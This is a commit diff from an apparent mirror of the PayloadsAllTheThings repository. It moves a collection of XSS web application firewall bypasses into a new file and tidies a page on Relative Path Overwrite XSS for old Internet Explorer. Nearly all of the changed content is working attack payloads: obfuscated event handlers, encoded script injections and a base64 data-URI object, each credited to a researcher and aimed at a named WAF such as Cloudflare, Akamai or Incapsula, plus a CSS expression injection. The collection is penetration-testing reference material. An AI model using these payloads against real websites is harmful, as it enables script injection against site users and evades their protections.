mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
WAF bypass moved to a separate page
This commit is contained in:
parent
2e73069238
commit
c34a2bac15
@ -82,23 +82,6 @@
|
|||||||
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
|
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
|
||||||
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
|
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
|
||||||
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
|
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
|
||||||
- [Common WAF Bypass](#common-waf-bypass)
|
|
||||||
- [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
|
|
||||||
- [25st January 2021](#25st-january-2021)
|
|
||||||
- [21st April 2020](#21st-april-2020)
|
|
||||||
- [22nd August 2019](#22nd-august-2019)
|
|
||||||
- [5th June 2019](#5th-june-2019)
|
|
||||||
- [3rd June 2019](#3rd-june-2019)
|
|
||||||
- [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10)
|
|
||||||
- [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018)
|
|
||||||
- [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018)
|
|
||||||
- [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018)
|
|
||||||
- [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018)
|
|
||||||
- [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019)
|
|
||||||
- [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018)
|
|
||||||
- [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018)
|
|
||||||
- [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018)
|
|
||||||
- [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019)
|
|
||||||
- [References](#references)
|
- [References](#references)
|
||||||
|
|
||||||
## Vulnerability Details
|
## Vulnerability Details
|
||||||
@ -1254,111 +1237,11 @@ GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a
|
|||||||
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
|
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
|
||||||
|
|
||||||
|
|
||||||
## Common WAF Bypass
|
|
||||||
|
|
||||||
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
|
||||||
|
|
||||||
#### 25st January 2021
|
|
||||||
|
|
||||||
```html
|
|
||||||
<svg/onrandom=random onload=confirm(1)>
|
|
||||||
<video onnull=null onmouseover=confirm(1)>
|
|
||||||
```
|
|
||||||
|
|
||||||
#### 21st April 2020
|
|
||||||
|
|
||||||
```html
|
|
||||||
<svg/OnLoad="`${prompt``}`">
|
|
||||||
```
|
|
||||||
|
|
||||||
#### 22nd August 2019
|
|
||||||
|
|
||||||
```html
|
|
||||||
<svg/onload=%26nbsp;alert`bohdan`+
|
|
||||||
```
|
|
||||||
|
|
||||||
#### 5th June 2019
|
|
||||||
|
|
||||||
```html
|
|
||||||
1'"><img/src/onerror=.1|alert``>
|
|
||||||
```
|
|
||||||
|
|
||||||
#### 3rd June 2019
|
|
||||||
|
|
||||||
```html
|
|
||||||
<svg onload=prompt%26%230000000040document.domain)>
|
|
||||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
|
||||||
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)
|
|
||||||
|
|
||||||
```
|
|
||||||
<svg/onload=alert()//
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cloudflare XSS Bypass - 27th February 2018
|
|
||||||
|
|
||||||
```html
|
|
||||||
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Chrome Auditor - 9th August 2018
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
</script><svg><script>alert(1)-%26apos%3B
|
|
||||||
```
|
|
||||||
|
|
||||||
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
|
||||||
|
|
||||||
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
|
||||||
|
|
||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
|
||||||
```
|
|
||||||
|
|
||||||
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019
|
|
||||||
|
|
||||||
```html
|
|
||||||
<svg onload\r\n=$.globalEval("al"+"ert()");>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018
|
|
||||||
|
|
||||||
```html
|
|
||||||
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
|
||||||
```
|
|
||||||
|
|
||||||
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
<a href=javascript:alert(1)>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
|
|
||||||
```
|
|
||||||
|
|
||||||
## Labs
|
## Labs
|
||||||
|
|
||||||
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
|
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||||
|
103
XSS Injection/XSS Common WAF Bypass.md
Normal file
103
XSS Injection/XSS Common WAF Bypass.md
Normal file
@ -0,0 +1,103 @@
|
|||||||
|
# Common WAF Bypass
|
||||||
|
|
||||||
|
## Cloudflare
|
||||||
|
|
||||||
|
* 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
```js
|
||||||
|
<svg/onrandom=random onload=confirm(1)>
|
||||||
|
<video onnull=null onmouseover=confirm(1)>
|
||||||
|
```
|
||||||
|
|
||||||
|
* 21st April 2020 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
```js
|
||||||
|
<svg/OnLoad="`${prompt``}`">
|
||||||
|
```
|
||||||
|
|
||||||
|
* 22nd August 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
```js
|
||||||
|
<svg/onload=%26nbsp;alert`bohdan`+
|
||||||
|
```
|
||||||
|
|
||||||
|
* 5th June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
```js
|
||||||
|
1'"><img/src/onerror=.1|alert``>
|
||||||
|
```
|
||||||
|
|
||||||
|
* 3rd June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
```js
|
||||||
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||||
|
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||||
|
```
|
||||||
|
|
||||||
|
* 22nd March 2019 - @RakeshMane10
|
||||||
|
```js
|
||||||
|
<svg/onload=alert()//
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
* 27th February 2018
|
||||||
|
```html
|
||||||
|
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Chrome Auditor
|
||||||
|
|
||||||
|
NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.
|
||||||
|
|
||||||
|
* 9th August 2018
|
||||||
|
```javascript
|
||||||
|
</script><svg><script>alert(1)-%26apos%3B
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Incapsula WAF
|
||||||
|
|
||||||
|
* 11th May 2019 - [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) -
|
||||||
|
```js
|
||||||
|
<svg onload\r\n=$.globalEval("al"+"ert()");>
|
||||||
|
```
|
||||||
|
|
||||||
|
* 8th March 2018 - [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)
|
||||||
|
```javascript
|
||||||
|
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
|
```
|
||||||
|
|
||||||
|
* 11th September 2018 - [@c0d3G33k](https://twitter.com/c0d3G33k)
|
||||||
|
```javascript
|
||||||
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Akamai WAF
|
||||||
|
|
||||||
|
* 18th June 2018 - [@zseano](https://twitter.com/zseano)
|
||||||
|
```javascript
|
||||||
|
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||||
|
```
|
||||||
|
|
||||||
|
* 28th October 2018 - [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480)
|
||||||
|
```svg
|
||||||
|
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## WordFence WAF
|
||||||
|
|
||||||
|
* 12th September 2018 - [@brutelogic](https://twitter.com/brutelogic)
|
||||||
|
```html
|
||||||
|
<a href=javascript:alert(1)>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Fortiweb WAF
|
||||||
|
|
||||||
|
* 9th July 2019 - [@rezaduty](https://twitter.com/rezaduty)
|
||||||
|
```javascript
|
||||||
|
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](TODO)
|
@ -1,25 +1,24 @@
|
|||||||
# XSS with Relative Path Overwrite - IE 8/9 and lower
|
# XSS with Relative Path Overwrite
|
||||||
|
|
||||||
|
:WARNING: Requires Internet Explorer 8/9 and lower.
|
||||||
|
|
||||||
You need these 3 components
|
You need these 3 components
|
||||||
|
|
||||||
```javascript
|
1. Stored XSS that allows CSS injection. : `{}*{xss:expression(open(alert(1)))}`
|
||||||
1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
|
2. URL Rewriting.
|
||||||
2) URL Rewriting.
|
3. Relative addressing to CSS style sheet : `../style.css`
|
||||||
3) Relative addressing to CSS style sheet : ../style.css
|
|
||||||
```
|
|
||||||
|
|
||||||
A little example
|
Here is the HTML code of `http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]`
|
||||||
|
|
||||||
```html
|
```html
|
||||||
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
|
||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
|
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
|
||||||
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
|
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -28,12 +27,13 @@ Explanation of the vulnerability
|
|||||||
> The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
> The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||||||
> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||||||
|
|
||||||
Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
|
* Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
|
||||||
Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
|
* Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
|
||||||
MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
|
* MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
|
||||||
|
|
||||||
From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
|
From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
|
||||||
|
|
||||||
|
|
||||||
## Mutated XSS for Browser IE8/IE9
|
## Mutated XSS for Browser IE8/IE9
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
@ -46,4 +46,4 @@ IE will read and write (decode) HTML multiple time and attackers XSS payload wil
|
|||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [TODO](TODO)
|
- [RPO - Relative VS Absolute - The Spanner - Friday, 21 March 2014](http://www.thespanner.co.uk/2014/03/21/rpo/)
|
Loading…
Reference in New Issue
Block a user